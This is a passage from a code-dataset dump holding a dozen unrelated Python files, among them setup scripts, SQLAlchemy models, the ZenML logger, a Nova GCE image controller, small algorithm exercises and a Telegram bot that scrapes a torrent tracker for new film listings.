line.string is not None:\n if \"Läsperiod\" in line.string:\n # print(text[current_line + 2].string)\n data[text[current_line + 2].string] = \"study_period\"\n # data.append((text[current_line + 2].string, \"study_period\"))\n if \"Tentamensperiod\" in line.string:\n # print(text[current_line + 2].string)\n # data.append((text[current_line + 2].string, \"exam_period\"))\n data[text[current_line + 2].string] = \"exam_period\"\n # if \"Omtentamensperiod\" in line.string:\n # print(text[current_line + 2].string)\n # data.append((text[current_line + 2].string, \"reexam_period\"))\n # data[text[current_line + 2].string] = \"reexam_period\"\n current_line = current_line + 1\n with open('data.txt', 'w') as outfile:\n outfile.write(json.dumps(data))\n\n\nif __name__ == '__main__':\n # test_scrape()\n scrape()\n","sub_path":"lasvecka-python/lasveckor_scraper.py","file_name":"lasveckor_scraper.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"504941422","text":"from setuptools import find_packages, setup\n\nPACKAGE = 'qgantt'\n\n# name can be any name. This name will be used to create .egg file.\n# name that is used in packages is the one that is used in the trac.ini file.\n# use package name as entry_points\nsetup(\n name='QGantt', version='0.1',\n author = \"Senmiao Liu\",\n author_email = \"liusenmiao@360quan.com\",\n description = \"Render gantt chart from ticket system using FusionCharts.\",\n license = \"GPLv3\",\n packages=find_packages(exclude=['*.tests*']),\n entry_points={'trac.plugins': '%s = %s' % (PACKAGE, PACKAGE)},\n package_data={'qgantt': ['templates/*', 'htdocs/fc/*',\n 'htdocs/css/*', 'htdocs/js/*']},\n)\n","sub_path":"qgantt/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"524831080","text":"name = input(\"Enter file:\")\nif len(name) < 1 : name = \"mbox-short.txt\"\nhandle = open('files/'+name)\nhrs=list()\ncount=dict()\nfor line in handle:\n if line.startswith(\"From \"):\n line.rstrip()\n words= line.split()\n time=words[5].split(\":\")\n hrs.append(time[0])\nfor hour in hrs:\n count[hour]=count.get(hour,0)+1\ntmp=sorted([(k,v) for k,v in count.items()])\nfor k,v in tmp:\n print(k,v)\n","sub_path":"tuples.py","file_name":"tuples.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"631693191","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Build import cythonize\n\nimport numpy\nimport subprocess\nimport os\nsubprocess.check_call(\"make\")\n\nimport numpy # noqa\n\n\ndef read_from_makefile(field):\n data = [line for line in open(\"kernel/Makefile\").readlines() if line.startswith(field)][0]\n data = \"=\" .join(data.split(\"=\")[1:])\n data = data.strip()\n data = data.split(\" \")\n return data\n\n\nobjects = [\"kernel/\"+obj for obj in read_from_makefile(\"OBJ\")]\nextra_compile_args = read_from_makefile(\"CXXFLAGS\")\n\n# replace $(EXTRAFLAGS) in extra_compile_args with environment variable\ntry:\n del extra_compile_args[extra_compile_args.index(\"$(EXTRAFLAGS)\")]\nexcept ValueError:\n pass\nextra_compile_args += os.environ.get('EXTRAFLAGS', \"\").split()\n# extra_compile_args += [\"-DCYTHON_TRACE=1\"]\n\nkwds = {\n \"language\": \"c++\",\n \"extra_compile_args\": extra_compile_args,\n \"extra_link_args\": objects,\n \"libraries\": [\"gmp\", \"pthread\"],\n \"include_dirs\": [numpy.get_include()],\n}\n\nextensions = [\n Extension(\"g6k.siever\", [\"g6k/siever.pyx\"], **kwds),\n Extension(\"g6k.siever_params\", [\"g6k/siever_params.pyx\"], **kwds)\n]\n\nsetup(\n name=\"G6K\",\n version=\"0.0.1\",\n ext_modules=cythonize(extensions, compiler_directives={'binding': True,\n 'embedsignature': True,\n 'language_level': 2}),\n packages=[],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"2042992","text":"from sqlalchemy import *\nfrom migrate import *\n\n\nfrom migrate.changeset import schema\npre_meta = MetaData()\npost_meta = MetaData()\ncomissions = Table('comissions', post_meta,\n Column('id', Integer, primary_key=True, nullable=False),\n Column('public_key_xQ', BigInteger),\n Column('public_key_yQ', BigInteger),\n Column('secret_key_xQ', BigInteger),\n Column('secret_key_yQ', BigInteger),\n)\n\n\ndef upgrade(migrate_engine):\n # Upgrade operations go here. Don't create your own engine; bind\n # migrate_engine to your metadata\n pre_meta.bind = migrate_engine\n post_meta.bind = migrate_engine\n post_meta.tables['comissions'].create()\n\n\ndef downgrade(migrate_engine):\n # Operations to reverse the above upgrade go here.\n pre_meta.bind = migrate_engine\n post_meta.bind = migrate_engine\n post_meta.tables['comissions'].drop()\n","sub_path":"db_repository/versions/016_migration.py","file_name":"016_migration.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"542383357","text":"from sqlalchemy import (\n MetaData, Table, Column, ForeignKey,\n Integer, String, Date,Boolean,\n PrimaryKeyConstraint, UniqueConstraint, ForeignKeyConstraint)\n\nmetadata = MetaData()\n\n\nusers = Table(\n 'users', metadata,\n Column('id', Integer, nullable=False),\n Column('login', String(256), nullable=False),\n Column('passwd', String(256), nullable=False),\n Column('is_superuser', Boolean, nullable=False, server_default='FALSE'),\n Column('disabled', Boolean, nullable=False, server_default='FALSE'),\n\n # indices\n PrimaryKeyConstraint('id', name='user_pkey'),\n UniqueConstraint('login', name='user_login_key'),\n)\n\n\npermissions = Table(\n 'permissions', metadata,\n Column('id', Integer, nullable=False),\n Column('user_id', Integer, nullable=False),\n Column('perm_name', String(64), nullable=False),\n\n # indices\n PrimaryKeyConstraint('id', name='permission_pkey'),\n ForeignKeyConstraint(['user_id'], [users.c.id], name='user_permission_fkey', ondelete='CASCADE'),\n)\nbots = Table(\n 'bots', metadata,\n Column('id', Integer, nullable=False),\n Column('user_id', Integer, nullable=False),\n Column('telegram_token', String(128), nullable=False),\n Column('bot_name', String(64), nullable=False),\n Column('webhook', String(256), nullable=False),\n # indices\n PrimaryKeyConstraint('id', name='bot_pkey'),\n ForeignKeyConstraint(['user_id'], [users.c.id], name='user_bot_fkey', ondelete='CASCADE'),\n\n)\nbot_options = Table(\n 'bot_options', metadata,\n Column('id', Integer, nullable=False),\n Column('bot_id', Integer, nullable=False),\n Column('perm_name', String(64), nullable=False),\n\n # indices\n PrimaryKeyConstraint('id', name='bot_options_pkey'),\n ForeignKeyConstraint(['bot_id'], [bots.c.id]\n , name='bot_option_fkey', ondelete='CASCADE'),\n\n)\n\n","sub_path":"robo_app/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"513781044","text":"import datetime\nimport time\n\nimport pandas as pd\n\nimport pymysql\n\n\ndef get_day_list():\n day_list = []\n datestart = datetime.datetime.strptime(start_day, '%Y-%m-%d')\n dateend = datetime.datetime.strptime(end_day, '%Y-%m-%d')\n d = datestart\n delta = datetime.timedelta(days=1)\n while d <= dateend:\n # print(d.strftime(\"%Y-%m-%d\"))\n day = d.strftime(\"%Y-%m-%d\")\n day_list.append(day)\n d += delta\n return day_list\n\n\nif __name__ == '__main__':\n start_day = '2019-01-24'\n end_day = '2019-02-10'\n # end_day = '2019-01-26'\n db = pymysql.connect(\"192.168.103.31\", \"root\", \"adminadmin\", \"hotpot\")\n cursor = db.cursor()\n # 获取起止时间的时间范围\n day_list = get_day_list()\n data_list = []\n filename = '海底捞门店数' + str(int(time.time())) + '.csv'\n for change_day in day_list:\n sql = \"\"\"SELECT storeId,storeName,city,city_level from SHOP_DETAIL WHERE storeId in (select DISTINCT storeId from SHOP_WAITE WHERE crawlTime='%s') GROUP BY storeId ;\"\"\" % change_day\n cursor.execute(sql)\n results = cursor.fetchall()\n df = pd.DataFrame(list(results))\n df['crawlTime'] = change_day\n df.to_csv(filename, mode='a', header=False, index=False)\n csv_data = pd.read_csv(filename,engine='python') # 再去读信息\n csv_data.to_excel('海底捞门店数.xlsx', index=False)\n","sub_path":"IDGdemo/数据库整理/海底捞/4.海底捞获取门店数.py","file_name":"4.海底捞获取门店数.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"275535823","text":"\"\"\"\n.\n\"\"\"\n\n# input\nalphabet = [\"A\", \"B\", \"C\", \"D\", \"E\", \"F\", \"G\", \"H\", \"I\"]\nk = 3\n\n# compute\nkmers = alphabet[:]\nfor _ in range(k-1):\n \n new_kmers = []\n for kmer in kmers:\n for char in alphabet:\n new_kmers.append(kmer+char)\n kmers = new_kmers[:]\n\n# out\nprint(\"\\n\".join(kmers))","sub_path":"Enumerate_Kmers_Lexic/enumerate_kmers_lex.py","file_name":"enumerate_kmers_lex.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"52141704","text":"import numpy as np\nimport sys\n\n\ndef read_vetices(filename):\n '''\n :param filename: obj file\n :return: a list of [x,y,z] from lines of vertices alone\n '''\n lines = open(filename).read().splitlines()\n vertices = [line.split()[1:] for line in lines if line.split()[0] == 'v']\n return vertices\n\n\ndef read_faces(filename):\n lines = open(filename).read().splitlines()\n faces = [line.split()[1:] for line in lines if line.split()[0] == 'f']\n faces_coord = []\n for i in faces:\n coord = [int(j.split('/')[0]) for j in i]\n faces_coord.append(coord)\n return faces_coord\n\n\n# def threes_from_all_vertices(vertices):\n# '''\n# change~!\n# :param vertices: a list of [x,y,z] of vertices\n# :return: threes of vertices\n# '''\n# n = len(vertices)\n# threes = [vertices[i:i+3] for i in range(0, n-2, 3)]\n# return threes\n\ndef threes_from_all_vertices(vertices, faces_coord):\n '''\n :param vertices: all vertices from file in order\n :param faces_coord: threes of coordinates of vertices in each face\n :return: threes of vertices according to faces\n '''\n threes=[]\n for i in faces_coord:\n threes.append([vertices[i[0]-1],vertices[i[1]-1],vertices[i[2]-1]])\n return threes\n\n\ndef normal_for_vertices(v1, v2, v3):\n '''\n :param v1: x\n :param v2: y\n :param v3: z\n :return: normal\n '''\n a = v1 - v2\n b = v1 - v3\n return np.cross(a, b)\n\n\ndef normals_for_all_vertices(threes):\n '''\n :param threes: threes of vertices, defining polygons\n :return: list of normals, normal for each polygon\n '''\n normals=[]\n for vvec in threes:\n v1 = np.array([float(i) for i in vvec[0]])\n v2 = np.array([float(i) for i in vvec[1]])\n v3 = np.array([float(i) for i in vvec[2]])\n normals.append(normal_for_vertices(v1, v2, v3))\n return normals\n\n\ndef areas(threes):\n # calculate area per polygon\n # Todo\n pass\n\n\ndef normalized_normals(normals):\n '''\n :param normals: the perpendicular vectors\n :return: normalized\n '''\n nn = []\n w = []\n for i in normals:\n normi = np.linalg.norm(i)\n if normi == 0:\n normalized_i = i\n else:\n normalized_i = i / normi\n nn.append(normalized_i)\n w.append(normi)\n return nn, w\n\n\ndef normals_for_file(filename):\n '''\n :param filename: the name of obj file\n :return: all the normalized normals from the file\n '''\n vertices = read_vetices(filename)\n faces = read_faces(filename)\n threes = threes_from_all_vertices(vertices, faces)\n normals = normals_for_all_vertices(threes)\n nn, w = normalized_normals(normals)\n return nn, w\n\n#print(normals_for_file('/home/stav/Downloads/1a2a5a06ce083786581bb5a25b17bed6.obj'))\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Error: filename missing')\n exit(1)\n filename = sys.argv[1]\n print(normals_for_file(filename))\n\n\n\n","sub_path":"PolygonMesh/polygon_normals.py","file_name":"polygon_normals.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"265111380","text":"#pancake sorting\n#used for the problem of sorting a disordered stack of pancakes in order by size\n#Spatula can be placed anywhere in the stack to flip pancakes\n#a pancake number is the minimum number of flips required for a given number of pancakes\n#the goal is to sort in as few flips as possible\n\n#reverse array [0..i]\ndef flip(arr, i):\n start = 0\n while start < i:\n tmp = arr[start]\n arr[start] = arr[i]\n arr[i] = tmp\n start += 1\n i -= 1\n\n#get index of max elemt in array [0..n-1]\ndef getMax(arr, n):\n maxIndex = 0\n for i in range(0,n):\n if arr[i] > arr[maxIndex]:\n maxIndex = i\n return maxIndex\n\n#main function that sorts\ndef pancakeSort(arr, n):\n size = n\n while size >1:\n maxIndex = getMax(arr, size)\n if maxIndex != size-1:\n flip(arr, maxIndex)\n flip(arr, size-1)\n size -= 1\n","sub_path":"algorithms/sorting/pancake_sort.py","file_name":"pancake_sort.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"26860259","text":"import numpy as np\r\nimport pandas as pd\r\n\r\nindex = np.array([0,1,2,3,4,5,6])\r\ncolumns = np.array(['Name','Age','Gender','Show'])\r\ndata = [\r\n ['John',10,'M','Kidzee'],\r\n ['Jinny',10,'F','Kidone'],\r\n ['Castor',11,'M','Kidkill'],\r\n ['Troy',12,'M','Kidkill'],\r\n ['Angel',9,'F','Kidmoon'],\r\n ['Gretel',11,'M','Kidhorror'],\r\n ['Elv',15,'F','Kidzee'],\r\n]\r\ndf = pd.DataFrame(index=index, columns=columns,data=data)\r\nprint(df)\r\n# To get only girls performance\r\n# df = df[df['Gender']=='F']\r\n# To get only boys performance\r\n# df = df[df['Gender']=='M']\r\n# To get only girls performance whose age is >10\r\n# df = df[(df['Age']>10) & (df['Gender']=='F')]\r\n# df = df[df['Gender']=='M'][['Name','Age']]\r\n# To change the index\r\n# df.set_index('Show',inplace=True)\r\n# df = df.set_index('Show')\r\n# print(df)","sub_path":"Pandas/DFOperations.py","file_name":"DFOperations.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"439429732","text":"# Copyright (c) ZenML GmbH 2020. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at:\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n# or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\nimport logging\nimport os\nimport re\nimport sys\nfrom logging.handlers import TimedRotatingFileHandler\nfrom typing import Any, Dict\n\nfrom absl import logging as absl_logging\n\nfrom zenml.constants import ZENML_LOGGING_VERBOSITY\nfrom zenml.enums import LoggingLevels\n\nfrom zenml.constants import ( # isort: skip\n ABSL_LOGGING_VERBOSITY,\n APP_NAME,\n)\n\n\nclass CustomFormatter(logging.Formatter):\n \"\"\"Formats logs according to custom specifications.\"\"\"\n\n grey: str = \"\\x1b[38;21m\"\n pink: str = \"\\x1b[35m\"\n green: str = \"\\x1b[32m\"\n yellow: str = \"\\x1b[33;21m\"\n red: str = \"\\x1b[31;21m\"\n bold_red: str = \"\\x1b[31;1m\"\n purple: str = \"\\x1b[1;35m\"\n reset: str = \"\\x1b[0m\"\n\n format_template: str = (\n \"%(asctime)s - %(name)s - %(levelname)s - %(message)s (%(\"\n \"filename)s:%(lineno)d)\"\n if LoggingLevels[ZENML_LOGGING_VERBOSITY] == LoggingLevels.DEBUG\n else \"%(message)s\"\n )\n\n COLORS: Dict[LoggingLevels, str] = {\n LoggingLevels.DEBUG: grey,\n LoggingLevels.INFO: purple,\n LoggingLevels.WARN: yellow,\n LoggingLevels.ERROR: red,\n LoggingLevels.CRITICAL: bold_red,\n }\n\n def format(self, record: logging.LogRecord) -> str:\n \"\"\"Converts a log record to a (colored) string\n\n Args:\n record: LogRecord generated by the code.\n\n Returns:\n A string formatted according to specifications.\n \"\"\"\n log_fmt = (\n self.COLORS[LoggingLevels[ZENML_LOGGING_VERBOSITY]]\n + self.format_template\n + self.reset\n )\n formatter = logging.Formatter(log_fmt)\n formatted_message = formatter.format(record)\n quoted_groups = re.findall(\"`([^`]*)`\", formatted_message)\n for quoted in quoted_groups:\n formatted_message = formatted_message.replace(\n \"`\" + quoted + \"`\",\n \"`\"\n + self.reset\n + self.yellow\n + quoted\n + \"`\"\n + self.COLORS.get(LoggingLevels[ZENML_LOGGING_VERBOSITY]),\n )\n return formatted_message\n\n\nLOG_FILE = f\"{APP_NAME}_logs.log\"\n\n\ndef get_logging_level() -> LoggingLevels:\n \"\"\"Get logging level from the env variable.\"\"\"\n verbosity = ZENML_LOGGING_VERBOSITY.upper()\n if verbosity not in LoggingLevels.__members__:\n raise KeyError(\n f\"Verbosity must be one of {list(LoggingLevels.__members__.keys())}\"\n )\n return LoggingLevels[verbosity]\n\n\ndef set_root_verbosity() -> None:\n \"\"\"Set the root verbosity.\"\"\"\n level = get_logging_level()\n if level != LoggingLevels.NOTSET:\n logging.basicConfig(level=level.value)\n get_logger(__name__).debug(\n f\"Logging set to level: \" f\"{logging.getLevelName(level.value)}\"\n )\n else:\n logging.disable(sys.maxsize)\n logging.getLogger().disabled = True\n get_logger(__name__).debug(\"Logging NOTSET\")\n\n\ndef get_console_handler() -> Any:\n \"\"\"Get console handler for logging.\"\"\"\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(CustomFormatter())\n return console_handler\n\n\ndef get_file_handler() -> Any:\n \"\"\"Return a file handler for logging.\"\"\"\n file_handler = TimedRotatingFileHandler(LOG_FILE, when=\"midnight\")\n file_handler.setFormatter(CustomFormatter())\n return file_handler\n\n\ndef get_logger(logger_name: str) -> logging.Logger:\n \"\"\"Main function to get logger name,.\n\n Args:\n logger_name: Name of logger to initialize.\n\n Returns:\n A logger object.\n\n \"\"\"\n logger = logging.getLogger(logger_name)\n logger.setLevel(get_logging_level().value)\n logger.addHandler(get_console_handler())\n\n # TODO [ENG-130]: Add a file handler for persistent handling\n # logger.addHandler(get_file_handler())\n # with this pattern, it's rarely necessary to propagate the error up to\n # parent\n logger.propagate = False\n return logger\n\n\ndef init_logging() -> None:\n \"\"\"Initialize logging with default levels.\"\"\"\n # Mute tensorflow cuda warnings\n os.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\"\n set_root_verbosity()\n\n # Mute apache_beam\n logging.getLogger(\"apache_beam\").setLevel(logging.WARNING)\n logging.getLogger(\"rdbms_metadata_access_object\").setLevel(logging.WARNING)\n\n # set absl logging\n absl_logging.set_verbosity(ABSL_LOGGING_VERBOSITY)\n","sub_path":"src/zenml/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"557609305","text":"# Copyright 2012 Cloudscaling Group, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport json\nimport os\nimport os.path\nimport tarfile\nimport tempfile\nimport urllib2\nimport webob\n\nfrom nova import exception\nfrom nova.api.gce.views import operations as operations_view\nfrom nova.api.gce.views import images as images_view\nfrom nova.api.gce import wsgi as gce_wsgi\nfrom nova.api.openstack import wsgi as openstack_wsgi\nfrom nova.image import glance\n\n\nclass Controller(openstack_wsgi.Controller):\n\n _view_builder_class = images_view.ViewBuilder\n\n def __init__(self, **kwargs):\n super(Controller, self).__init__(**kwargs)\n self._image_service = glance.get_default_image_service()\n\n def index(self, req):\n images = self._get_images(req)\n return self._view_builder.index(req, images)\n\n def show(self, req, id):\n \"\"\"Return data about the given image name.\"\"\"\n context = self.get_context(req)\n try:\n image = self._image_service.show(context, id)\n return self._view_builder.basic(req, image)\n except exception.NotFound:\n raise webob.exc.HTTPNotFound()\n\n def delete(self, req, id):\n \"\"\"Delete an image, if allowed.\"\"\"\n context = self.get_context(req)\n try:\n self._image_service.delete(context, id)\n except exception.ImageNotFound:\n explanation = _(\"Image not found.\")\n raise webob.exc.HTTPNotFound(explanation=explanation)\n return webob.exc.HTTPNoContent()\n\n def create(self, req, body):\n context = self.get_context(req)\n\n name = body['name']\n desc = body.get('description')\n image_ref = body['rawDisk']['source']\n resp = urllib2.urlopen(image_ref)\n tar = tempfile.TemporaryFile()\n tar.write(resp.read())\n tar.seek(0)\n tar_file = tarfile.open(fileobj=tar)\n member = tar_file.next()\n if member is None:\n msg = _(\"TAR-file is empty\")\n return webob.exc.HTTPBadRequest(explanation=msg)\n img_filename = member.name\n tar_file.extract(member, tempfile.gettempdir())\n img_filename = os.path.join(tempfile.gettempdir(), img_filename)\n location = 'file://' + img_filename\n img_file = open(img_filename, 'rb')\n meta = {'name': name,\n 'disk_format': 'raw',\n 'container_format': 'bare',\n 'min_disk': 0,\n 'min_ram': 0}\n image = self._image_service.create(context, meta, img_file)\n\n tar_file.close()\n img_file.close()\n tar.close()\n\n target_link = self._view_builder._get_links(req,\n image['id'],\n self._view_builder._collection_name)\n operation_type = 'insert'\n os.remove(img_filename)\n return operations_view.generate_operation(req,\n target_link, operation_type)\n\n def _get_images(self, req):\n context = self.get_context(req)\n images = self._image_service.detail(context)\n return images\n\n def get_context(self, req):\n return req.environ['nova.context']\n\n\ndef create_resource():\n return gce_wsgi.GCEResource(Controller())\n","sub_path":"nova/api/gce/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"626221514","text":"import torchvision.transforms as transforms\nimport functools\nfrom classification import labels\nfrom typing import Dict\nfrom nltk.corpus import wordnet\n\n# Normalize function for mean + standard deviation\n# used for all imagenet images.\n# Transforms the array into a normalized RGB array\nnormalize_transform = transforms.Normalize(\n mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225]\n)\n\n\n# Used to compress the image to a max of 256 edge pixels\nimage_edge_length = 256\n\n\n# Slightly smaller crop of the compressed image for processing\ncrop_size = 224\n\n\nclass Label:\n id: str\n name: str\n uri: str\n\n def __init__(self, id: str, name: str, uri: str):\n self.id = id\n self.syn = wordnet.of2ss(id)\n self.name = name\n self.uri = uri\n\n def is_a(self, synset) -> bool:\n if self.syn == synset:\n return True\n hypernyms = self.syn.hypernyms()\n while synset not in hypernyms:\n hypernyms = hypernyms[0].hypernyms()\n if hypernyms == []:\n return False\n return synset in hypernyms\n\n\n\n@functools.lru_cache(maxsize=1, typed=False)\ndef get_labels() -> [Label]:\n result = []\n for i in range(1000):\n label_dic = labels.labels.get(i)\n label = Label(\n id=label_dic['id'],\n name=label_dic['label'],\n uri=label_dic['uri']\n )\n result.append(label)\n return result\n","sub_path":"classification/imagenet.py","file_name":"imagenet.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"544816684","text":"import grid_utils\nimport colors\nimport math\nfrom operator import attrgetter\nimport time\nfrom algorithms import algorithm_utils\n\n\n\ndef start_search(grid, PATHFINDER_DELAY, SHORTEST_PATH_DELAY):\n\n\n # get the start position and end position\n for row in grid:\n for square in row:\n if square.state == \"start_pos\":\n start_pos = square\n\n elif square.state == \"end_pos\":\n end_pos = square\n\n\n grid_utils.clean_grid(grid)\n\n\n start_pos.gScore = algorithm_utils.find_g(start_pos, start_pos)\n start_pos.hScore = algorithm_utils.find_h(start_pos, end_pos)\n start_pos.fScore = algorithm_utils.find_f(start_pos.gScore, start_pos.hScore)\n\n\n openList = [start_pos]\n closedList = []\n\n\n\n while len(openList) > 0:\n\n\n current_node = algorithm_utils.get_lowest_f_node(openList)\n\n openList.remove(current_node)\n closedList.append(current_node)\n\n\n\n if current_node.state == \"end_pos\":\n\n time.sleep(0.02)\n\n path = [end_pos]\n node = current_node\n while node.parent != None:\n time.sleep(SHORTEST_PATH_DELAY)\n node = node.parent\n path.append(node)\n if node != end_pos:\n node.color = colors.GREEN\n\n node.backtrack = True\n\n\n start_pos.color = colors.RED\n end_pos.color = colors.RED\n return\n\n if current_node == start_pos:\n current_node.color = colors.RED\n else:\n current_node.color = colors.ORANGE\n current_node.found = True\n\n\n\n time.sleep(PATHFINDER_DELAY)\n\n x = current_node.x\n y = current_node.y\n\n # get nodes around current node\n node1 = grid[x][y - 1]\n node2 = grid[x][y + 1]\n node3 = grid[x - 1][y]\n node4 = grid[x + 1][y]\n\n successor_nodes = [node1, node2, node3, node4]\n\n for node in successor_nodes:\n\n\n # check if walkable\n if (node.state == \"wall\") or (node in closedList):\n continue\n\n\n hypo_fscore = current_node.gScore + 1\n node_is_better_than_current = False\n\n if node not in openList:\n node_is_better_than_current = True\n node.hScore = 0\n openList.append(node)\n\n elif hypo_fscore < node.gScore:\n node_is_better_than_current = True\n\n if node_is_better_than_current == True:\n node.parent = current_node\n node.gScore = hypo_fscore\n node.fScore = node.gScore + node.hScore\n\n\n\n\n print(\"Path Not Found\")\n\n\n for node in closedList:\n if node.state == \"wall\":\n continue\n elif node == start_pos:\n node.color = colors.GREEN\n else:\n node.backtrack = True\n node.turn_red = True\n","sub_path":"algorithms/diekstra.py","file_name":"diekstra.py","file_ext":"py","file_size_in_byte":3198,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"70328535","text":"# -*- encoding: utf-8 -*-\nimport telegram\nimport ConfigParser\nimport time\nimport codecs\nimport random\nfrom bs4 import BeautifulSoup\nfrom urllib2 import urlopen, URLError\n\n\nconfig = ConfigParser.RawConfigParser()\nconfig.read('settings.cfg')\n\nINTERVAL = int(config.get('Telegram', 'INTERVAL'))\nADMIN_ID = int(config.get('Telegram', 'ADMIN_ID'))\nbot = telegram.Bot(token=config.get('Telegram', 'TOKEN'))\n\nMOVIES = config.get('RT', 'MOVIES')\nURL_RUTOR = config.get('RT', 'URL_RUTOR')\nURL_FILMS = URL_RUTOR + config.get('RT', 'URL_FILMS')\nFILTER = [e for e in config.get('RT', 'FILTER').split(',')]\nNOTIFICATION_INTERVAL = int(config.get('RT', 'NOTIFICATION_INTERVAL'))\nBANNED_FILE = config.get('RT', 'BANNED')\nBANNED = []\nlast_time = None\n\n\ndef main():\n global last_time, BANNED\n try:\n update_id = bot.getUpdates()[0].update_id\n except IndexError:\n update_id = None\n\n BANNED = get_list_from_file(BANNED_FILE)\n while True:\n try:\n update_id = check_updates(update_id)\n now = time.time()\n if last_time is None or now - last_time >= NOTIFICATION_INTERVAL:\n check_movies()\n last_time = now\n time.sleep(1)\n time.sleep(INTERVAL)\n except telegram.TelegramError as e:\n if e.message in (\"Bad Gateway\", \"Timed out\"):\n time.sleep(1)\n elif e.message == \"Unauthorized\":\n update_id += 1\n else:\n raise e\n except URLError as ex:\n time.sleep(300)\n\n\ndef check_updates(update_id):\n for update in bot.getUpdates(offset=update_id, timeout=10):\n chat_id = update.message.chat_id\n update_id = update.update_id + 1\n message = update.message.text\n if message and chat_id == ADMIN_ID:\n run_command(chat_id, message)\n elif message and chat_id != ADMIN_ID:\n bot.sendMessage(chat_id=chat_id, text='You\\'re not autorized to use me!')\n bot.sendMessage(chat_id=ADMIN_ID, text='Someone tried to use me!')\n return update_id\n\n\ndef get_list_from_file(file):\n f = open(file)\n list = f.readlines()\n f.close()\n return list\n\n\ndef get_text_from_file(file):\n f = open(file)\n list = f.read()\n f.close()\n return list\n\n\ndef check_movies():\n f = codecs.open(MOVIES)\n list = f.readlines()\n f.close()\n check_rutor(list)\n\n\ndef check_rutor(movies):\n for movie in movies:\n req = movie.replace(' ', '%20').rstrip('\\n')\n url = URL_FILMS + req\n page = urlopen(url)\n soup = BeautifulSoup(page.read(), 'html.parser')\n results = soup.find_all('tr', {'class': ['gai', 'tum']})\n for result in results:\n all_tds = result.find_all('td')\n second_td_as = all_tds[1].find_all('a')\n naming_link = second_td_as[2]\n direct_link = second_td_as[0]['href']\n id = direct_link.split('/')[-1]\n size = all_tds[3].get_text('', strip=True)\n if len(result) > 0 and check(naming_link):\n bot.sendMessage(chat_id=ADMIN_ID,\n text='[%s](%s%s) - [%s](%s) - %s'\n % (naming_link.get_text(' ', strip=True),URL_RUTOR,\n naming_link['href'], size, direct_link, id),\n parse_mode=telegram.ParseMode.MARKDOWN)\n\n save_to_file(BANNED_FILE, id)\n BANNED.append(id)\n\n\ndef check(result):\n for fil in FILTER:\n try:\n if fil.decode('utf-8').lower() in result.get_text(' ', strip=True).lower():\n return False\n except Exception:\n if fil.lower() in result.get_text(' ', strip=True).lower():\n return False\n for ban in BANNED:\n if ban.rstrip('\\n') in result['href']:\n return False\n return True\n\n\ndef run_command(chat_id, cmd):\n global last_time\n if cmd.startswith('/addfilter'):\n operation(cmd, chat_id, 'ADD_FILTER')\n elif cmd == '/showfilters':\n show_filters(chat_id)\n elif cmd.startswith('/ban'):\n operation(cmd, chat_id, 'BAN')\n elif cmd == '/showbans':\n list = get_text_from_file(BANNED_FILE)\n if len(list) > 0:\n bot.sendMessage(chat_id=chat_id, text='This is your banned list:\\n%s' % list)\n else:\n bot.sendMessage(chat_id=chat_id, text='Seems that your banned list is empty')\n elif cmd == '/check':\n check_movies()\n last_time = time.time()\n bot.sendMessage(chat_id=chat_id,\n text='Checked: %s' % time.strftime('%H:%M:%S', 